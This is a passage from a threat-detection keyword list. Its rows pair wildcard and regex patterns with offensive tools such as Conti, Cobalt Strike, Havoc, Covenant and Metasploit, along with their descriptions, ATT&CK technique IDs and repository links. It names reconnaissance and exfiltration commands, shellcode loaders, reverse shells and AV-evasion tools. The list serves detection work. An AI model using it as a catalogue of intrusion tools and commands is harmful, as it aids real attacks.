As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*shell net localgroup administrators*",".{0,1000}shell\snet\slocalgroup\sadministrators.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*shell nltest /dclist*",".{0,1000}shell\snltest\s\/dclist.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*shell rclone.exe copy *",".{0,1000}shell\srclone\.exe\scopy\s.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*shell should now be running as nt authority\\system!*",".{0,1000}shell\sshould\snow\sbe\srunning\sas\snt\sauthority\\\\system!.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","0","N/A","8","2","135","26","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z" "*shell whoami 
/user*",".{0,1000}shell\swhoami\s\/user.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","36","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*shell whoami*",".{0,1000}shell\swhoami.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*shell.exe -s payload.txt*",".{0,1000}shell\.exe\s\-s\spayload\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" "*shell_shocked*.js*",".{0,1000}shell_shocked.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*shell_shocked*.rb*",".{0,1000}shell_shocked.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*shell_smbadmin -Targets *",".{0,1000}shell_smbadmin\s\-Targets\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*shell_startup_files_modification.py*",".{0,1000}shell_startup_files_modification\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*shell_tknadmin -Domain * -DomainController *",".{0,1000}shell_tknadmin\s\-Domain\s.{0,1000}\s\-DomainController\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*shell_wmiadmin -Domain * -DomainController*",".{0,1000}shell_wmiadmin\s\-Domain\s.{0,1000}\s\-DomainController.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral 
Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Shell3er.ps1*",".{0,1000}Shell3er\.ps1.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","1","N/A","N/A","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*shellc *.bin *",".{0,1000}shellc\s.{0,1000}\.bin\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*shellc *.shellc *",".{0,1000}shellc\s.{0,1000}\.shellc\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*ShellCmd cmd.exe *",".{0,1000}ShellCmd\scmd\.exe\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*ShellCmd copy 
*",".{0,1000}ShellCmd\scopy\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*ShellCmd net *",".{0,1000}ShellCmd\snet\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*ShellCmd sc qc *",".{0,1000}ShellCmd\ssc\sqc\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Shellcode & key Decrypted after stomping*",".{0,1000}Shellcode\s\&\skey\sDecrypted\safter\sstomping.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*SHELLCODE GENERATOR*",".{0,1000}SHELLCODE\sGENERATOR.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - 
T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*shellcode inject *",".{0,1000}shellcode\sinject\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Shellcode Injected Successfully*",".{0,1000}Shellcode\sInjected\sSuccessfully.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*Shellcode injection complete!*",".{0,1000}Shellcode\sinjection\scomplete!.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*Shellcode path changed:*shellcode_path*",".{0,1000}Shellcode\spath\schanged\:.{0,1000}shellcode_path.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - 
T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*Shellcode Process Hollowing.csproj*",".{0,1000}Shellcode\sProcess\sHollowing\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*Shellcode Process Hollowing.csproj*",".{0,1000}Shellcode\sProcess\sHollowing\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*Shellcode Process Injector.ps1*",".{0,1000}Shellcode\sProcess\sInjector\.ps1.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*shellcode spawn *",".{0,1000}shellcode\sspawn\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable 
post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*shellcode*shellcode.bin*",".{0,1000}shellcode.{0,1000}shellcode\.bin.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use them with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*shellcode.asm*",".{0,1000}shellcode\.asm.{0,1000}","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","458","134","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z" "*shellcode.bin.donut*",".{0,1000}shellcode\.bin\.donut.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*Shellcode.x64.bin*",".{0,1000}Shellcode\.x64\.bin.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*shellcode_dll.dll*",".{0,1000}shellcode_dll\.dll.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*shellcode_dll\*",".{0,1000}shellcode_dll\\.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*shellcode_dotnet2js*",".{0,1000}shellcode_dotnet2js.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*shellcode_dropper.c*",".{0,1000}shellcode_dropper\.c.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted Windows binary from inside memory without a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","690","117","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "*shellcode_dynwrapx*",".{0,1000}shellcode_dynwrapx.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Shellcode_encryption.exe*",".{0,1000}Shellcode_encryption\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. 
currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","401","48","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" "*shellcode_exec.py*",".{0,1000}shellcode_exec\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*shellcode_generator.*",".{0,1000}shellcode_generator\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","612","106","2024-01-02T20:56:41Z","2021-01-12T14:39:06Z" "*shellcode_generator_help.html*",".{0,1000}shellcode_generator_help\.html.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt 
Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","612","106","2024-01-02T20:56:41Z","2021-01-12T14:39:06Z" "*shellcode_inject.csproj*",".{0,1000}shellcode_inject\.csproj.{0,1000}","offensive_tool_keyword","PowerLessShell","PowerLessShell relies on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1445","249","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" "*shellcode_inject.rb*",".{0,1000}shellcode_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. 
exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*shellcode_injectproc.xml*",".{0,1000}shellcode_injectproc\.xml.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*ShellCode_Loader.py*",".{0,1000}ShellCode_Loader\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. 
